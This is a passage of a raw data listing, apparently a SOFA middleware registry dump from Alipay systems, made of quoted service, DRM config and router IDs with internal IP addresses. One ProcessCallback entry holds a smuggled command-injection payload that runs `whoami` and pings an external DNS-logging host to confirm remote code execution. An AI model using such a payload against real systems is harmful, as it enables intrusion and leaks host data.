#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentlib.common.service.facade.roster.RosterListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.UioRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.gaodeDegrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.posdevice.KbPosDeviceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.bank.api.QuickPointService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchpromoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.FundCalendarQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.common.voucher.api.AssettransVoucherCommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.LabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:pcreditprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.exchange.VcpAssetExchangeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ideploy.common.service.facade.deploy.IcDeployActionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.transport.TransportStrategyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:antsecurity_marscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpscore.common.service.facade.service.model.MpsModelService:1.0:dx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bumng.common.service.facade.SystemConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.211.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizActionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmatchcore.core.service.service.RequirementMatchingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.archiveAmountFilters,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echannelcenter.common.service.facade.mng.EchannelScriptConfigManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finsmarttwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkstmtcore.common.service.facade.fileservice.FileServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.context.facade.CserviceContextService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.SettleRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointmng.common.service.adjust.api.VouchercoreLogQueryFacadeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.event.CommoditiesOffsetLimitControlEventHandlerForTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.minReduceRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.drm.Drm4DispatchTask.dispatchTasks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.distinguishprod.common.service.facade.ResVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.icp.ICPInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.APICommonTaskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.service.facade.moneyfund.api.MftransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.common.service.facade.api.service.TypeResolverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsContinuousQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IOPENHOME#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acappcore.biz.buildpack.internal.rest.TechstackInternalRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appxprod.common.service.facade.api.databoss.syncunit.LoaderSyncUnitConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceListQueryApi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-kabaoprod-pass-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bicgpu.common.service.facade.facerecognition.FaceRecognitionAlgorithmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_CPCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@antprocess#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.koubei.kbindustryomp.common.service.facade.api.merchant.MerchantBatchTaskPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.datacloud_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:alipaypointcust@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.exratecenter:name=com.alipay.exratecenter.common.service.client.drm.CacheRefreshDrmResource.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.dms.common.service.DmsModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openaccess.common.quickaccess.facade.service.proxy.ConfigCallBackUpadateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.BizOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.watchlist.InvestOpinionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers__NOTIFYEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilerelation.common.service.facade.back.TlouBizAppConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.script.api.DqPlanScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_F_IRECON_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebppcore.facade.LdcTairSwitchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbasecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:securitysimulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.pkgCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:name@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.LogLevelSwitchConfig.logLevelMapView,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:settleprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.transit.TransitRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.cloudparse.CloudparseBizRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.McardOutFundCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cifperm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:crmanOpsChngSyncRiskService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferPriceObjectFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.reservecenter.facade.api.CreditTransferApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.CapApplicationService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.smdd.facade.isv.LSMDD4IsvImageUploadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.RecallConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.176.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundcardprod.common.service.prepay.facade.management.api.CardManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.price.PriceConsultStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:testmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spannermng.common.service.facade.OperationTypeOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:bizfundprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.sla.businessroute.drm.BusinessRoutePolicy.grayRoutePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:tallycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdatalink.common.service.facade.dataexchange.DataExchangeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-TEST_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinsnsprod.biz.service.gw.community.api.user.SecuUserVisitMentalManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.kbase.common.service.facade.api.article.ArticleFrontQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.157.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.CapitalTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.selection.SelectionRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.133.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.contentfactory.common.service.facade.appx.config.CrawlerConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.stepflow.engine.facade.StepFlowEngineAgentFacade:1.0:pcmt-inner-flow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.price.PricePlanConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fpsPlaceProcessorCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.MessageLogManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcb:name=com.alipay.fundselling.common.drm.MigrateSwitchDrm.facades,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:emccenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.drm.FluxstrategyDrm3rdVersion.influxWhiteInstIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gclearingcenter.facade.api.GclearingInstMemberMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.AoneProjectBugFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.sync.AccountSyncOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mrchcommercelab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.common.api.InsUserCenterGrayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.transfer.BankTransferOrderManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.appinstancegroupversion.ExecutionResultFacade:1.0:default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileappcommon.common.service.facade.openapi.clientswitch.ClientSwitchOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.custcenter.service.facade.lifecycle.antglobal.AntRegistrationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.service.facade.LXGenericFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.MerchantProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.workpoint.WorkPointFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbordersync.common.service.facade.spi.OrderPushProcessCallback:1.0:mappprod-merchantapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.alsc.AlscItemAggQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SMSGW_HIGH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:cloudbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.gfpayment.PaymentInstructionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aclinkedcore.common.service.facade.PipelineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@identitymatrix#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.timeout.common.service.facade.api.TimeoutFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tegg.trserver.SpiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.PlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.galaxy.FinComposeGalaxyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkassetmore_approvedProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.task.facade.TaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:selfoptmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.iotcube.common.service.facade.openapi.upgrade.UpgradeSpecialConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.45.152.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.workflow.common.service.facade.api.tsd.TsdChannelProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.bank.api.QuickPointService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.spi.AccmChngSyncService:1.0:gotone_change_pcmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.invoke.InvokeFactoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.shared.message.MessageSubscribeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExClientRateMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.message.api.ChatMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_smartcall_sourceFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_SMDD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbbuservice.common.service.facade.manager.AppConfManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.outside.H5ControllerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.185.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.pdcore.common.service.facade.ProductSyncFacade:1.0:SSCMW1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.search.MobileAppSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agmcenter.common.service.facade.api.ProtocolTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.v2.invest.InvestManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.218.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.service.spi.DataProcessService:1.0:vehownerprod-ccb-central-zk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.integration.proxy.WalleProxy:1.0:execute-offline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrorprod.service.task.PlaybackTaskService:1.0:playbackTaskTrService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.morderprod.common.service.facade.CommonConfigService:1.0.0:commonConfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certifymng.service.facade.GreenBusinessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adgdcore.common.service.facade.GdEngineServiceFacade:1.0:adgdcore-gd-engine@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.32.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.swiftbaascore.api.facade.SubProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.source.doom.DoomInvokeConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.opnecore.OpenIdAdaptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.forum.api.ForumQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.MerchantNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.SingleYebIncomeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dayutrprod.common.facade.link.GOCMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openhome.facade.pamir.menu.PamMenuCacheQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acquotacore.facade.QuotaFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.discardDwDagId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";ping `whoami`GIYHU5BSMQWTC5LVPJRW2LK7NFXHA5LUL5RWQYLSONSXILLEHFZTO3DZMF2A----.rce.scan.noble.dn5l0g.co;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.workflow.WorkflowMobileManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.solution.MerchantOrderSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.57.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.channelmanager.alarm.AlarmSubscriberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.InstSaleForbiddenManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.drmdemos:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mfinbaseprod:name=com.alipay.darwin.sdk.config.fetchMsg.configFetchMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.30.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.APIDbkeyFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dwsap.common.service.facade.release.WorksheetReleaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commission.common.service.facade.api.statement.StatementServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.mng.feature.facade.ComplexQueryService:1.0:mybank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.usergroup.InsMktProdUserGroupConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:simpleShopCreateExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.buc.api.RoleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.integration.ctu.RiskAdvicePolicyClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.algo.kbknowledgegraph.common.service.facade.CustomMapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zifim:name=com.alipay.fc.common.lang.drm.AntBizMonitorCfgDrm.dynamicAntLogExtKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmng.common.service.facade.api.MerchantRiskOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.62.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scardcenter.common.service.facade.OfflinepayPartnerInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_CARDBIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mychain-bms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.manage.facade.BudgetLibManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.core.engine.service.api.ValidationService:1.0:mydds@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.updateRecoveryStatusToFail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.131.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:bpservice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.PlatformReleaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliminiabilityprod.facade.api.ApiConfigRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanApplyDrmResource.drawnMonitorUserByPassSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.waitersupport.facade.SsmHoldSharesFaca